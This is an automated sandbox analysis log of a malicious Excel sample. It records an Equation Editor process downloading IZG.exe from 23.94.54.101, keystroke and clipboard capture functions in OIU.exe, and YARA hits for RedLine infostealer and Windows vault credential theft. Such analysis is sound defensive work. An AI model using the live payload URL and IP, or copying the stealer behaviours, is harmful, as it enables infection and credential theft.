                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,3_2_00C1CE44
                  Source: global trafficHTTP traffic detected: GET /chrome/whats-new/m109?internal=true HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=NzyG8Nyv5BXujfkwphRTYxYEUVrb6jfX_2yeMuOfr_qNQxqvDKRrqrtrWEHZHxhJMeNDaUmaaS78O00fbCizccjghnIwkZvzsdQQgN5U-zhjUS1gHO8WIzLKgkl7guG8eeDU6_nnrtuUBmXKAstwUTeNKKRjYiMJ5yVbTN5x7t8
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=LkB_Hqntk55N-FkwqFcQWCEnqMKKabQfBv3CxQkaVu55mLFJndbeF9V5VbzO9R-GXq9I1GDYTeTS1uxTIrLIlWxuTFfPAOau3qyc6NTtnoWDpxWH0gdAD-ycAotGgLayl5TMxnrYksi6Xoq5vii-hCUmjtaY1oMG5kTAFZhXqVE
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA; 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKiDzLEGIjBAUeVDNkDlIZK5bJjKqxg5bm1WdYDjlLN5FTPlXAMxmGzLgqn1-pjmnO28YPm4sx4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKiDzLEGIjDtjnMJodbdiXF-HQ_fQDkAxnKugxL_IiaU5Bdf1yGe-xSVBDfYF_nK-idk43_IHf0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-02; NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA
                  Source: global trafficHTTP traffic detected: GET /IZG.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCross-Origin-Resource-Policy: cross-originContent-Type: text/html; charset=UTF-8X-Content-Type-Options: nosniffAccept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-MotionCritical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-MotionVary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-MotionDate: Thu, 02 May 2024 02:59:48 GMTServer: sffeContent-Length: 187622X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                  Source: EQNEDT32.EXE, 00000002.00000002.457837834.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.54.101/IZG.exe
                  Source: RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.
                  Source: RegSvcs.exe, 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620104008.000000000281C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: RegSvcs.exe, 0000000C.00000002.620104008.0000000002858000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, abAX9N.cs.Net Code: _7wfqbBU
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00C1EAFF
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00C1ED6A
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00C1EAFF
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_00C0AA57
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_00C39576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Binary is likely a compiled AutoIt script file
                  Source: OIU.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: OIU.exe, 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5a728d17-0
                  Source: OIU.exe, 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7f8a3710-9
                  Source: OIU.exe, 00000005.00000002.460606758.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_43f1efc1-2
                  Source: OIU.exe, 00000005.00000002.460606758.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 